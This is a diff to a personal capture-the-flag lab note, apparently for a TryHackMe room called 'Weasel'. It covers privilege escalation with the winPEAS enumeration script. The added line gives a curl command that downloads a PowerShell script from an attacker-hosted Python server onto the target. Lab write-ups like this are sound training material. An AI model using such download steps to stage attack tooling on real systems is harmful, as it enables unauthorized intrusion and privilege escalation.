hutgrabber/personal/thm/weasel/WEASEL.md

 ## PrivEsc
  * **WinPEAAS**
     - We can get winPEAAS from here - `https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/WinPeas.ps1`.
-    - Performing curl is not working, hence we can do the python server method.
+    - Performing curl is not working, hence we can do the python server method : `curl http://10.6.36.128:8000/a.ps1 --output a.ps1`.
     -

 ## Explaination Time !!
 ---